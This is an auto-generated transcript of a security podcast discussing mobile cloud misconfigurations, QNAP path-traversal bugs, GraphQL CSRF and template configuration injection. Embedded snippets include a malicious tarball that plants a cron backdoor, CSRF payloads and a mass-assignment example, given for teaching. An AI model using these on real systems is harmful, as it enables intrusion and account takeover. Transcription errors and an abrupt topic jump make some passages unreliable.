NoSQL Injection, Mobile Misconfigurations and a Wormable Windows Bug
This transcript is automatically generated; there will be mistakes.
Hello everyone. Welcome to the last episode of the Day Zero podcast before our summer break. I'm Specter, with me is zi. Happy Victoria Day to our Canadian friends out there; I don't know how many we have, but I'm sure we have a few. In this episode we have some impactful misconfiguration bugs when it comes to mobile, a Windows bug in the HTTP kernel driver, and some other research sprinkled in. Before we get into the topics: once again, we are going on break for the summer. This is our last episode until September 6th; that's the first Monday of September that we're going to be back. We're not going to be stopping content completely, just taking a break on the podcast. We will have some other streams. For example, last week zi and I did a stream looking at IDA Free, which has the cloud decompiler now, so for the first time ever Hex-Rays has a free decompiler out. It was pretty cool to check out. We didn't really cover that on the podcast when IDA Free dropped, but if you want our thoughts on it, like I said, zi and I did a stream on it and looked into it. A VOD will be going out for that this week, so keep a lookout for it. We always put out any videos and whatnot on Discord and on Twitter, so if you follow us on those mediums you'll see immediately when those videos go out. Also, we have our mini-series out now on making the transition from CTF to real world. It consists of three videos and a free blog post to go with them, if you prefer blog posts to videos. The first discussion covers both the differences and the challenges of moving into the real world from CTF. The second video tunnels in on vuln research and some strategies for learning that. And the final video is on exploit development in a similar fashion: strategies for learning it, how to make the shift, and the differences between CTF and real world.
Yeah, and I am definitely excited to finally get it out. I've talked about wanting to do this post for quite a while, so to actually have it out is kind of nice. It covers a lot of topics that I think just haven't really been hit on too
much. Yeah, it's a full discussion. I think especially the exploit dev discussion was probably the one I enjoyed the most. Yes, the first one is kind of ramping up into the other two.
Yeah, and the vuln research one is more just, like, I feel like it's necessary in order to get into the exploit dev, rather than treating exploit dev as entirely
separate. Yeah, you've got to kind of lay the groundwork a little bit. So yeah, we cover all of that in those videos; just wanted to shout those out quickly. With that out of the way, we can move into a little bit of news. GitHub put out some updates to their exploit and malware policy. You may remember we talked about this a few weeks ago, and there were a lot of concerns around unclear use of terms and the way they phrased their statements in the policy. So they finally made an update based on that feedback, and at least with some of the stuff that I've looked at, it looks like they've done a better job here. If you remember the last time we covered this, the wording we talked about the most was the "we do not allow content that contains or installs exploits," or something along those lines, which raised
concern around the wording, like, anything that harms... a lot of vagueness just around what exactly "harm"
meant. Yeah, just kind of leaving things unexplained and up in the air. So they've now reworded some of those phrases into things like "directly supports unlawful activities or malware campaigns," for example, just adding a bit of clarification on what they're talking about. And they also added some examples around what they mean by technical harm, such as causing denial of service, physical damage, or overconsumption of resources with no clear purpose other than abuse. So, like, not doing a security assessment, right? If you're causing a denial of service and there's no clear other intent, then that is classified as not allowed.
So yeah. And they do call out, like, educational content and dual-use content; they're starting to call things out specifically, which is definitely a good sign indicating that they're listening to some of the feedback that was there. I mean, they did put out the last policy for feedback, and they got that feedback, which was largely negative at first, and they have clarified it, which is, you know, the right move on their part. I think they do need to have a policy that includes the ability to take some things down, especially with GitHub kind of offering a CDN sort of service. They also mention a little bit about what their takedowns would look like: in a lot of cases, they say a takedown may just put content behind normal authentication, so you can't retrieve it as an anonymous file but need a login to view the pages, which I think is extremely fair when it comes to some of that content, because that stops malware that's just grabbing the file, since it would have to log in as a particular user. So I was impressed they added that information also, and I think it's completely
fair. Yeah, I like these policy updates. I think I said at the time, when the initial call for feedback went out, that a lot of people were being uncharitable towards GitHub, saying that, you know, this is just another thing Microsoft is doing now, that they're trying to remove all exploits or whatever. And I feel like people really jumped the gun there; like you said, it was a call for feedback, it's not like they just threw it in there. I feel like these updates reflect that they're trying to act in good faith. They're not trying to, you know, completely tank the security research community on GitHub. I think their statements here, especially the way they have reworded them, are pretty reasonable and resolved a lot of the concerns that I saw raised on the initial call for feedback. So yeah, I think they did a good job here; they took the feedback in stride, and nothing really stood out to me as being bad. I don't know if you have anything to call out, but I think overall it was a positive set of changes.
Yeah, no, nothing really stands out as a poor choice to me. Ultimately, like I said, they do need to have some sort of content policy. They have made this fairly clear: they have tried to define what they mean by the more ambiguous phrases, like "technical harm," including examples of what they mean, making it clear that they're not targeting educational content, and they're not targeting dual-use content. Basically, they've made things clear on every objection, or at least every meaningful objection, I think I've
heard. That's a good way of phrasing it; there have been some unreasonable takes. So yeah, all the reasonable stuff I think was addressed there. So good job on GitHub, I guess. All right, let's get into some exploits. Up first, we have a Check Point Research topic about various application developers who have misconfigured or badly implemented integrations with cloud services, which all in all could have exposed over a hundred million records of personal data. zi, I'll let you take this one away.
Yeah, there's definitely the potential for a lot of records to be out there, though they kind of talk about a lot of it in vague terms. They talk about the general issue, not really going into every specific application; they have a list, I think towards the end, of every application and the rough vulnerability it had. The three issues that they do talk about are misconfigured real-time databases, cloud storage being misconfigured (either with the keys in the application, something like that), and the keys for push notifications being in the application. I want to use this as a point to touch on cloud security in general, because this is very common when you start running into any sort of mobile apps, or even a lot of just-in-the-cloud applications. With things built over, like, Firebase from Google, you run into a lot of those cases where it's so easy to not configure security appropriately. And I kind of put the blame a little bit on Google and AWS and Azure and the other providers, for providing products that are easy to configure insecurely, I guess is how I'd phrase it. The example here is the real-time databases: it's really easy to misconfigure something like, I want to say Firebase, but I think Firebase is the name of their larger platform. There's a couple
of products; Firestore or something, I think, is the actual name of their storage and real-time database. But it's really easy to set that up, and when you set up something like that, you're kind of leaving yourself in a position where you're not setting up a back-end server anymore. You don't have your traditional "here's my front-end application, here's my back-end server where I'm running the database, and I'll write an API in front of the database for my application." Instead, you're communicating directly with the database from the application. And Google, of course, understands there are security implications of that sort of two-tier architecture, so Google is providing the API to the database and the authentication there. But you need to know how to configure that properly, and that's where, I mean, a lot of people just don't realize the security implication: every user kind of has all the access, and it's the same endpoint the developers would be using. Like I said, it's just really easy to misconfigure. And it's the same deal when it comes to cloud storage; in that case, it's more about the keys. When you stop having the back-end server, where do you put the secrets that you need? You should still have something for that, so clients don't get them. That's kind of the deal with the push notifications: you want to keep that secret key away from the client, but it's so easy to just build it into your application. You're already doing all the database logic in the application, why not include these keys in there also? That's effectively what they found. It's not earth-shattering or anything too crazy, just some very common vulnerabilities. They did in particular find that one developer here had "hidden" the keys using base64 encoding. In fact, that's not really much security, and I can't even say the developers thought it was secure. It's
not very strong obfuscation; nobody will be able to decode base64.
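As a concrete illustration of the real-time database misconfiguration zi is describing: with Firebase's Realtime Database, access control lives in a JSON rules file, and the difference between wide open and locked down is a couple of lines. This is a sketch based on Firebase's documented rules syntax; the comments are annotations, not strict JSON:

```
// Misconfigured: any client on the internet can read and write everything.
{
  "rules": {
    ".read": true,
    ".write": true
  }
}

// Safer: require authentication and scope each user to their own record.
{
  "rules": {
    "users": {
      "$uid": {
        ".read": "auth != null && auth.uid === $uid",
        ".write": "auth != null && auth.uid === $uid"
      }
    }
  }
}
```

The first form is what ships when a developer just wants the app to work, and since the client talks to the database endpoint directly, anyone who extracts the database URL from the app gets the same access.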
Yeah, I mean, the thing is, the value is needed by the client. Well, in their architecture the value is needed by the client; the architecture just shouldn't be so simple. Like, they should have a back-end server where secret operations can be performed, or only use APIs that are kind of safe to use from the client, which push notifications are
not. You could also kind of skate around this issue by using Android secure storage, no? I was just kind of thinking about that while you were talking about it.
To an extent, you can.
Yeah, look, I don't think it's the best solution, but it's probably better than base64-encoding it.
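For anyone newer to this: base64 is an encoding, not encryption, and recovering the original value is a single call. The key below is made up for illustration:

```python
import base64

# A hypothetical push-notification server key a developer "hid" with base64.
# Encoding is reversible by design; it provides no secrecy at all.
encoded = base64.b64encode(b"example-push-server-key-1234").decode()

# Anyone who unpacks the APK recovers the key with one function call.
decoded = base64.b64decode(encoded)
```

Any string-search over the app's resources followed by a decode pass turns these "obfuscated" secrets back into working credentials.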
Yeah. So base64, you know, isn't anything, but the developer may not have even thought it was
secure; I assume that was their intent, I guess. What kinds of
records were being exposed? They do only really go off the Google Play installs to get their numbers, a lot of the apps having 10 million plus installs, and therefore, you know, however many
records. Yeah, it was quite a few records. The one that I found funny was the Astro Guru one. Not even really anything super technical, but the information that they had stored: they had, like, the email, name, gender, and birth date, which is sensitive personal information. But the birth date they had down to the minute; they had the minute of the birth. I guess that's important for astrology.
Yeah, I mean, there is that whole area; that's, you know, the alignment of the planets at the time of your
birth. Oh, right. Okay, I see.
So it kind of makes sense if they have it,
but I just thought that was a really funny field in there. But yeah, I think this is a good post. Like you said, it doesn't really tunnel in on a specific target; it's more of an overview, kind of a research-heavy post calling out what application developers commonly misuse. All right, up next we have QNAP, looking at Music Station and Malware Remover, which had some issues, we'll say. Music Station had a preauth arbitrary file upload, and Malware Remover had another arbitrary file write that was even more powerful. First we'll talk about Music Station, which isn't a pre-installed application, but it is a popular app. One of the things that it allows you to do is upload album covers onto the NAS; since it's a music station, that's functionality that makes sense to support. The problem is they take both an art type and a file name with a verified image extension, and they combine those to create the file path to write the cover image to. But it's not protected against path traversal, like, at all, so by just setting an art type that's like "../../whatever", you can traverse directories to get an arbitrary file write as root to a somewhat controlled location. It is limited by the fact that you don't control the full file name, because the code does some manipulation on the filename, like it'll add some unique string towards the end of it, I think, and you are limited by the extension as well; it's going to keep that extension in there. So you do get the arbitrary file write as root, but the impact is kind of limited there: you're not really going to be able to overwrite files very easily, just plant new ones. The second issue, in Malware Remover, is more impactful though, and unlike the last one it's a pre-installed app, and ironically it also can't be removed. So if this app is installed, you're kind of vulnerable by default
because it's just kind of there, and, you know, the anti-malware ends up being the issue, or the anti-
virus. Yeah, it's a fun class of products to hit. So the issue is, it runs its malware scans through a cron job, which it'll do at a certain time every day, which you can configure. It'll run a script to do that scan, and that script will source a common script, which traverses a directory in the package called "modules" to load in Python modules and whatnot. One of the modules it loads is the auto-upgrade module, and that module has an arbitrary file write issue: it mounts a temporary file system at a config path under /tmp, and if that file system contains a tarball, it'll extract it to a temporary folder. Well, when it does that extraction, there are no checks against path traversal, and there's a race on the config mount, because somebody can just write into that directory while the script is operating on it. They do try to do some checks on the file system they mount, but, I mean, somebody else can race that and write after the checks but before the tarball is unpacked, and /tmp is accessible to everyone. So because of that, you can abuse it and use something like evilarc to plant files on the system. Again, you get that file write as root, and since it's not as restricted as the first one, it's fairly easy to get a reverse shell as root and then pop the NAS the next time Malware Remover does its scan. So yeah, the second issue is obviously a lot more impactful than the first one, but the issues themselves are not really too earth-shattering. It's really just a tale as old as time: we don't check the paths, especially in tarball extraction. That's just an area that is not protected against very well.
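The tarball trick is worth a quick sketch. The idea (which tools like evilarc automate) is a member whose name contains ../ sequences, so a naive extract writes it outside the destination directory. The cron payload and paths here are hypothetical, and the containment check at the bottom is the kind of validation that was missing:

```python
import io
import os
import tarfile

def make_evil_tar() -> bytes:
    # Build, in memory, a tarball whose member name climbs out of the
    # extraction directory.
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        payload = b"* * * * * root /tmp/shell.sh\n"  # hypothetical cron line
        info = tarfile.TarInfo(name="../../../etc/cron.d/backdoor")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()

def is_safe_member(dest: str, member: tarfile.TarInfo) -> bool:
    # The missing check: resolve each member against the destination and
    # reject anything that escapes it before extracting.
    target = os.path.normpath(os.path.join(dest, member.name))
    return target.startswith(os.path.abspath(dest) + os.sep)

evil = tarfile.open(fileobj=io.BytesIO(make_evil_tar()))
member = evil.getmembers()[0]
# A naive extractall("/tmp/extract") would write this member to
# /etc/cron.d/backdoor instead of staying under /tmp/extract.
```

Recent Python versions grew extraction filters for exactly this reason, but plenty of extraction code (in any language) still trusts member names blindly.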
We've talked about these sorts of issues quite a few times in the past year, yeah, and on the podcast in general,
really. Yeah, if we had to do a count, I don't even know how high it would be, but it would be high, maybe like 50 or something; it's a lot. So yeah, up next we have a quick two-factor authentication bypass through force browsing. The affected product was kept obscure; they didn't want to talk about it because they found it in a private bounty program. The post first touches on force browsing, which is kind of a fancy way of saying broken or non-existent access controls. Usually with this target, you need to provide a one-time code that gets sent to the email address when you register, to validate that address. It's unclear if this also includes needing it to be an internal-domain email, or if this is just bypassing the need to verify emails in general; they don't really talk about that too much, I guess because of the private research.
Because it's a 2FA bypass, I'm assuming, and because they only talk about it here, I mean, I'm assuming this is just, like, they bypass it at just the one time; it's not really a continuing thing. And, I mean, having an email token, there are a few websites that will do that, where it's like a magic login link. In general, though, I think usually you just kind of verify once, and they bypass the need to verify that one time.
Yeah, the details are a little bit lacking here, which I do kind of understand: they wanted to not give away too much information, to keep the product, you know, not identifiable to whoever is reading it. But anyway, when they do that one-time code check, it's all enforced on the front end. But the problem is, you can intercept the POST request, which usually goes to the /api/signup/verify endpoint; you can change that to go to /api/signup, just removing the /verify off the end, and then add the password into the request body, where it usually isn't there. And whatever happens on the back end when it goes to parse that, it just accepts the ability to create the account without needing to send that one-time code. So it's just bypassing the one-time code requirement for registering an account. So I'm not sure how high the impact really is there. Like I said, well, I'd
like... being able to register an account as any email, that would be interesting; so you're kind of getting at, or like, does this include, like, forgot-password or something? I'm assuming not, because then they probably would mention that. But the ability just in general to sign up with any email... I was a bit disappointed by this one, because it's presented as a second-factor authentication bypass, whereas email verification, unless it's being used during the login, like I mentioned with that sort of magic link, I wouldn't consider a second-factor authentication. This one doesn't really come off as second-factor authentication to me. I can understand why they call it that; like, I don't want to be all nitpicky on what they're calling their post, I just had a different idea when I saw the title of this. The one thing that does make me kind of raise a question here, though, is they do mention specifically that you remove the /verify from the POST request and, in the body of that POST request, add a password field and a password. So presumably you can actually put in a password anyway; it's not actually specific to that path. It's just interesting that that in particular was needed, especially since it's mentioned that you do fill out the password as part of that initial POST, like, when you're making that POST request you do need to fill out the password. So the fact that it's not there when it's going up to /verify is just a little bit weird to me. At first when I was reading this, my thought was, maybe this is something like, it would just kind of iterate over the keys provided and set those fields within the database for the user. That seems kind of like a mass-assignment type of issue, but it's not unheard of to do that. So it seemed like, okay, you just provide the password when they're not expecting it. But now I've just kind of noticed that my understanding there is just a guess, because you do send the password initially, unless it just doesn't actually use it at all.
But yeah, because my thinking here was that this was actually more of a mass-assignment sort of issue, but within the database, so assignment of database columns: you prematurely issue the password and set it to something, so you're able to log in and bypass the actual verification. That might not be the case. I will say, I don't think there's any way we're going to know what it was; the information just isn't there in this
write-up. Yeah. So we're kind of in our favorite place to be, which is speculation land. Yeah, the main place where my mind went was, like, where websites will kind of whitelist the emails you can use to sign up, and that's where I was thinking this might be useful, for bypassing that verification of the email.
But their example email is a gmail-style .com.
Okay. That's true. So,
So, is gmail.com actually, like, the same?
Gmail? I have no idea, I don't know. Maybe Google does have that one registered too.
I've never seen it registered. Yeah, I know, I haven't seen it either. It doesn't look like it's loading, so my assumption is it might either be a typo, or they were just hiding it in general, like not showing the actual one. No, fair enough. I just noticed that.
A typo is probably my guess. But yeah, it's hard to comment too much on what the impact exactly is when we're so limited on the target information.
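The mass-assignment theory the hosts keep coming back to is easy to sketch. This is purely illustrative, not from the post; the field names and handler are made up. The danger is a signup handler that copies every client-supplied key onto the user record, letting an attacker set columns the endpoint never meant to expose:

```python
# Default columns for a newly created, not-yet-verified account.
DEFAULT_USER = {"email": None, "password": None, "verified": False}

def vulnerable_signup(request_body: dict) -> dict:
    user = dict(DEFAULT_USER)
    # Mass assignment: every key the client sends becomes a column value,
    # including ones the endpoint never meant to expose.
    user.update(request_body)
    return user

def safer_signup(request_body: dict) -> dict:
    user = dict(DEFAULT_USER)
    # Allow-list only the fields a client is supposed to control.
    for field in ("email", "password"):
        if field in request_body:
            user[field] = request_body[field]
    return user

# The attacker adds one extra field to the signup body and is registered
# as already verified, skipping the one-time code entirely.
attacker_body = {"email": "a@example.com", "password": "hunter2", "verified": True}
vuln_user = vulnerable_signup(attacker_body)
safe_user = safer_signup(attacker_body)
```

If the real backend works anything like the vulnerable version, sending the password (or a verified flag) where it isn't expected would behave exactly as the post describes.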
Yeah, I mean, being able to bypass the verify
is worthwhile. An interesting attack with that, I mean: could they sign up for an email that's already
registered? Oh, isn't that... what, I...
would be one way you could take this, and they don't indicate, like, we don't have that information, but that would kind of be one attack that would at least be interesting to try. Since it does seem like there is a little bit of trust in the client going on here, where maybe you can skip some of the checks, such as this verify, there's a chance that sort of check might be skipped elsewhere also. There's also transitive
trust going on, which wouldn't be... That's a good one to call out; I like that one.
Yeah, but I mean, we don't know, and honestly there just isn't enough detail in this post to go beyond that. But I thought it was an inter... a potentially interesting post, at least to
cover. Yeah, I agree. All right, moving on to a post from Doyensec about GraphQL and CSRF. Again, this is one of those posts where it's not really touching on a specific issue, more just talking about the class of CSRF as a whole and where it can appear, even though the developer might not expect it, when using GraphQL. So they go through a few examples there. One example they give is with POST requests: they may think that, because JSON content types are believed to be invulnerable to CSRF, since you typically can't send those request types from a CSRF context,
So I would actually touch on that. Like, if you're in an environment where Flash is available (you don't need to exploit Flash for this), I used to have so much fun doing kind of complex CSRF, because Flash would let you set certain headers. Like, normally you wouldn't be able to send such an HTTP request, but your attack page would include a little SWF file that would let you make other HTTP requests, and they would be made in the context of the browser still, with all the cookies and everything, but you could go ahead and add whatever headers you want. They ended up restricting Flash; they restricted the headers a couple of times, so I'm not sure if current Flash would even let you do application/json. That is kind of a rough target. I mean, it's not like Flash is widely deployed anymore, but that was one way you could deal with the application/json issue that I guess has kind of been forgotten. Or, well, it wasn't well known even at the
time. Flash really was a hacker's best friend, huh? It was, yeah. So, yeah, application developers may think they're kind of invulnerable to CSRF with those request types, but they can be fooled, because the middleware will sometimes accept form-urlencoded requests in place of them, and those requests can be sent from a CSRF context, which kind of opens the door to the CSRF-type issues. Another set of issues they mention is CSRF due to using GET requests, both in terms of queries and mutations, which I don't think you're supposed to
do, but people definitely do, yeah. On the middleware: something else the middleware will provide that isn't mentioned here is that occasionally you'll be able to change the method of the request. This just depends on the middleware, so you have to kind of do the research, do the legwork on that yourself. But sometimes you can include something like a URL parameter, _method, and change it from GET, or, well, put POST in there even though you're sending it as a GET, and it will rewrite it for you. And I have seen that also for indicating that it's a JSON-type request versus the standard one, so you can send a standard body even though it's not actually JSON. Usually this is kind of meant more for during development, but I have seen it hit production, so it is just something worth looking into. I think we've covered it before; I forgot to look up what episode it was, but quite a while back we covered an attack using that.
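The override zi describes can be sketched in a few lines of middleware logic. This is hypothetical; real frameworks differ in which parameter they honor and whether GET requests are eligible:

```python
from urllib.parse import parse_qs, urlparse

def effective_method(raw_method: str, url: str) -> str:
    # Sketch of method-override middleware: if the query string carries a
    # _method parameter, the request is routed as that method instead.
    # Some stacks honor this even on GET, turning "safe" requests into
    # state-changing ones that are trivially CSRF-able via a link or <img>.
    params = parse_qs(urlparse(url).query)
    override = params.get("_method", [None])[0]
    return (override or raw_method).upper()
```

So a cross-site GET to something like `/api/user?_method=POST` would be routed to the POST handler, with the victim's cookies attached.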
I was about to say, I can't recall specifics, but I know we've covered that exact type of issue before, with, like, the request being rewritten. But like you said, it's been a while, so, you know, my memory is not good enough to remember when that even was exactly; I'd have to go searching. But yeah, one thing they mention there is a way they tested that the GET request abuse could happen: if an application is misconfigured and exposes the GraphiQL console, which allows both query and mutation requests. And then another issue they call out is when state-changing operations, like setting user data, are exposed on GET queries, and the example they give there is one where, like, it sets a user email and takes an ID value, which an attacker can control, in the query. Toward the end, they talk about how these types of issues can be abused to perform things like cross-site search to exfiltrate state and secrets. It's a perfect medium for that kind of attack, cross-
site search, actually, especially when you're doing, like, the timing attack with it. If you're able to get something to hit GraphQL, that is a really good way to use it, obviously, because with GraphQL you're using it to query; it's a very powerful query language. You can get a lot of information that way and figure out a lot by crafting the right timing
query. Yeah. They also released an extension that's worth calling out, called InQL, which is a Burp extension to automatically test for the issues they detail here. But yeah, like I said, it's more just talking about the things that can happen, not things specific to a target, just things to be aware of, I guess, if you're a developer. They did also include some stats from research they've done on various top companies. I don't think they really go into specifics on what those companies are, but that's completely understandable. They found that 50% of them were vulnerable to cross-site search and 10% of them were vulnerable to more powerful CSRF attacks. So yeah, that was kind of a nice little gem they had at the end there. But overall just a good post, and we've talked about GraphQL before in some topics, but I don't think any of them covered as much breadth as this article has.
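To make the content-type fallback from earlier concrete: the danger is middleware that accepts either body format and hands the resolver the same query. A hedged sketch, with a made-up permissive parser and mutation:

```python
import json
from urllib.parse import parse_qs

MUTATION = 'mutation { updateEmail(email: "attacker@evil.test") { ok } }'

# What the developer expects: a JSON POST, which a cross-site <form>
# cannot produce.
json_body = json.dumps({"query": MUTATION})

# What a plain auto-submitting HTML form CAN send cross-site, with the
# Content-Type application/x-www-form-urlencoded:
form_body = "query=" + MUTATION

def middleware_parse(body: str, content_type: str) -> str:
    # Sketch of permissive middleware: either content type yields a query.
    if content_type == "application/json":
        return json.loads(body)["query"]
    if content_type == "application/x-www-form-urlencoded":
        return parse_qs(body)["query"][0]
    raise ValueError("unsupported content type")
```

Both bodies reach the resolver as the identical operation, so "we only speak JSON" provides no CSRF protection by itself; the fix is a real CSRF token or SameSite cookies.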
Yeah, that's the thing: this one doesn't get too much depth, but it does have good breadth in terms of just covering a good number of attacks. But yeah, we have covered GraphQL before. I don't think we've mentioned InQL before, but it is quite useful; I should have had some other tools ready to recommend also. But, I mean, this does also just come down to protecting against CSRF, which is a reasonably well understood attack, especially now that you're starting to get SameSite cookies. If you start using those, that'll make some of these attacks more difficult, although GraphQL is often meant to be, I guess I shouldn't say often, at times it is meant to be consumed by a lot of different
clients. So there is still kind of the room for such attacks, though. I guess when it's supposed to be consumed like that, it probably shouldn't be doing any mutations.
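And the GET-based mutation case they tested is the classic zero-click CSRF: the whole state-changing operation fits in a URL, so any page the victim visits can fire it. The endpoint and field names below are invented for illustration:

```python
from urllib.parse import urlencode

# If mutations are reachable over GET, the entire operation fits in a URL,
# and an <img> tag on an attacker's page fires it with the victim's
# cookies attached.
mutation = 'mutation { setUserEmail(id: 1337, email: "attacker@evil.test") { ok } }'
csrf_url = "https://app.example/graphql?" + urlencode({"query": mutation})

# Embedded on any page the victim merely visits:
img_tag = '<img src="' + csrf_url + '">'
```

This is why GraphQL servers are generally told to reject mutations over GET entirely, independent of any token scheme.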
But yeah, it's one of those posts where it's talking about a common bug class; like you said, CSRF is pretty well known, just in an area that people haven't really thought about too much yet and that hasn't really been hammered yet. So
Well, I mean, it's not that people haven't really thought about it, because we've talked about attacks that have gone on to abuse GraphQL in attacks like this and, you know, whatever way they could. So it's not like it's not there, but like you said, there's a breadth to this post that's worth discussing and worth pointing
out. Yeah. I think the most recent one we've covered was with some of the Facebook issues and how GraphQL was abused there, yeah.
Although that was more of a case where they already had access, as in code... or, like, they
had, I think it was XSS, yeah.
Yeah, or they had the token, actually, and they were able to use that to steal the CSRF token and make further requests, because the CSRF token was in the
execution context. Yeah. So, for example, the case here is turning off autoescape, so then they can set the filter such that it actually performs code execution; that was their example attack. I mean, it really does come down to just that mixing of code and data, or in this case, configuration and data. Like, it's that mixing of data that shouldn't mix, I guess, would be a better way to put it. Yeah, you should have your configuration set up separately from providing user
data. So the key issue there is just that, you know, problem of allowing untrusted users to pass in the object, the second argument. This is kind of an interesting question: would you consider the fact that an application takes configuration data through the Express render API a problem on its own? Or would you not, since it can't be abused without another issue to chain with? I could see you going either way on that, but personally I would think that that would also be an issue worth calling out, like its own kind of CVE, I guess.
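A toy renderer makes the autoescape point concrete. It mimics the shape of an Express-style render(view, options) call, where one dictionary carries both template variables and engine configuration; everything here is a hypothetical sketch, not the actual engine's code:

```python
import html

def render(template: str, options: dict) -> str:
    # Toy engine: the options dict carries BOTH template variables and
    # engine configuration, such as whether to autoescape output.
    autoescape = options.get("autoescape", True)
    out = template
    for key, value in options.items():
        if key == "autoescape":
            continue
        text = str(value)
        if autoescape:
            text = html.escape(text)
        out = out.replace("{{" + key + "}}", text)
    return out

# Normal use: user data is escaped before it lands in the page.
safe = render("<p>{{name}}</p>", {"name": "<script>alert(1)</script>"})

# If the application forwards the request body as the options dict, the
# attacker smuggles configuration in alongside data and turns escaping off.
attacker_options = {"name": "<script>alert(1)</script>", "autoescape": False}
unsafe = render("<p>{{name}}</p>", attacker_options)
```

The library works as designed in both calls; the vulnerability only materializes when an application lets untrusted input occupy the configuration position, which is exactly the "whose CVE is it" debate here.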
Well, I don't know if I'd call it a CVE, just because, like I said, it's not a security issue on its own; it depends on the actual application developers making the insecure choice of allowing user data to come in as configuration data. Like, this could easily be solved by, in their templates, using a separate data field where they would end up passing these things, so then it would be treated as part of the, I guess, upper map of that dictionary, which could contain the configuration. So there are ways the developer could use it. It's a poor design choice, for sure. I don't know if I would necessarily expect a CVE to be filed over this, though; there's just reporting it as a high-level potential misuse location, because, like I said, it requires somebody downstream to write bad code. It doesn't stand on its own as an issue; you need to have it used poorly. I think we've talked about this before when it came to a crypto library, I forget what it was, where it just comes down to, like, yeah, there's bad code and bad usage of those libraries, and those libraries I think should be held to a certain standard of, like, ease of use. That was especially so when it came to the crypto issue that we were talking about. In this case, they are following a fairly common pattern: a lot of templating engines will work this way, or will work in a similar way. They could do better, but yeah, I wouldn't necessarily call this on its own a CVE without something internal being exploitable,
I guess. Yeah, I think I would call it more of a red flag or a code smell. I just wanted to bring up the question because it is the kind of thing where I have seen some debate before about whether or not it should be considered, maybe not a CVE specifically, but whether or not a company will take it as an issue and actually address it or whatever. CVE is just, like, the shortest way to say
that I guess the other way to kind of, think about that. So it's like what about a bug Bounty? Would you report this in a bug bounty? That I think is a more interesting question. I would want to lean towards
no. I can
understand why somebody that bike just you know want to toss it out. There is like what? Maybe I can get some money for this? They, you know,
accept it. So the argument that's kind of foreign it forming in my mind, if I wanted to play Devil's Advocate, it's like if you wouldn't accept this issue in a bug Bounty then would you accept like a an authenticated access or something and a web app? You need a first stage attack to be able to get in right it's behind authentication so you need an authentication Bypass or something but it's still an issue so I guess but like obviously on specific kind of depend on scope but
No, so I think your XSS comparison kind of falls apart, because it's an issue either way with the cross-site scripting. Like, I think you should still accept cross-site scripting regardless of whether or not it's behind authentication, whereas I can kind of be against this one. In the case of cross-site scripting, you're the application maintainer and it's your code that is vulnerable. In this case, you're the library maintainer: you've built this library, and it's somebody else's code that is using it insecurely, calling, you know, a function they shouldn't, using it in a way they shouldn't be using it. It's somebody else's problem, not the library maintainer's problem. Whereas cross-site scripting, in that case, is all inside of the one
application. That's a very fair distinction. So yeah, fair enough, I'll throw away my little devil's advocate argument then.
So, I mean, I could understand if somebody were to report it. I feel like it is one of those very low-severity issues on its own. It is one of those things that feels like you're just hoping you're going to get a payout, hoping you're going to get a little money out of it, and that's all. I wouldn't really blame somebody for it, but I disagree with it. This is something that you could report on a vulnerability assessment or an application-level pentest, something like that, you know, reporting it because you're trying to let the client know: hey, here's what you need to be aware of, here's kind of the threat, here's how you can mitigate it, do with that as you will; you're just providing the client all the information. Bug bounties, I think, do need to be a little bit more selective.
Yeah, in terms of bug bounties specifically, you're going to have to squeeze it into the scope, basically. If they consider this type of issue out of scope, which they most likely will, then I guess you could submit it if you wanted to, but don't be surprised if it just gets closed as invalid or whatever.
So yeah, I mean, this is the same as if you were to imagine a library providing, like, the ability to call eval. Kind of the same idea: it's not a good idea, but without somebody actually calling it, there's no
vulnerability. Yeah, you have to demonstrate it can be taken advantage of in some kind of way from an attacker's perspective.
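The eval analogy above can be made concrete with a tiny, purely illustrative Python sketch (the `compute` helper is hypothetical, not any real library's API):

```python
# Illustrative only: a library exposing an eval-style helper is not a
# vulnerability by itself; the bug appears when a caller feeds it
# untrusted input.

def compute(expr):
    """Hypothetical 'convenience' API that evaluates an expression."""
    return eval(expr)  # dangerous primitive, but inert without a bad caller

# Safe usage: a developer-controlled constant. The library is fine here.
assert compute("2 + 3") == 5

# Unsafe usage pattern: an attacker-controlled string reaching compute()
# is where the vulnerability is actually created, in the caller's code.
user_input = "__import__('os').getcwd()"  # stand-in for a payload
result = compute(user_input)              # executes attacker-chosen code
```

This is the distinction the hosts draw: the library provides a sharp primitive, but the reportable bug only exists once downstream code hands it untrusted data.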
So I do think it's fair for GitHub Security Lab to call this one out. I do think it would have been interesting had they called it out as a class of attack on multiple different template engines, or at least covered whether they looked at other template engines. As it is, they're kind of calling out just this one, and I hadn't heard of Squirrelly.
Yeah, I hadn't heard of it either.
Maybe it's the only one doing it, I don't know.
The way they phrased it made it sound like it's a pretty common thing. So,
yeah, so I would expect more reports to come out of this that are very similar. I guess, you know, they did have their deadlines and disclosed it after the deadline, so maybe we'll see more in the near
future. Yeah, I mean, we've seen GitHub do posts before about things they report on often. I'm trying to remember the specific title that I have in mind; I can't think of it right now, but they have done some of those research posts before where they call out a class of issues.
Oh yeah, I really like their look at the glue, where they were... I want to say they called it attacking the glue, but they might not have... where they looked at attacking the middle layer between, like, Python and C, where you have that interoperability layer, looking for memory corruptions and stuff in those calls. I thought that was a really interesting one from them, and I think if they did a post like that on templating engines, that could have some really interesting content. GitHub Security Lab does some solid research. Someone in chat mentioned: "I found a bug in math.js once and thought it was really a bug because it was basically an eval function. Then months later, someone also found it and made it into a huge thing." That's the thing: this is the type of issue that you can get people behind pretty easily, I think. Remaining professional, it should still be, you know: if you're hired by them to be doing an assessment, give them all the information, just be real about it; it's not an issue on its own. If it's on a bug bounty, though, outside of that, I have a hard time recommending you actually call it out. Oh, so I guess one thing you might want to consider is documentation around the dangers of the function. Maybe not reporting it as a bug bounty issue, just reporting it as, like: hey, I noticed you guys do this, you should really document the dangers of it, or something like that. But it is the type of issue, especially eval compared with this, which is just the configuration aspect, although it can turn into RCE... eval being a little bit more direct. My feeling is you could very easily, you know, get on Twitter and rile up people around it,
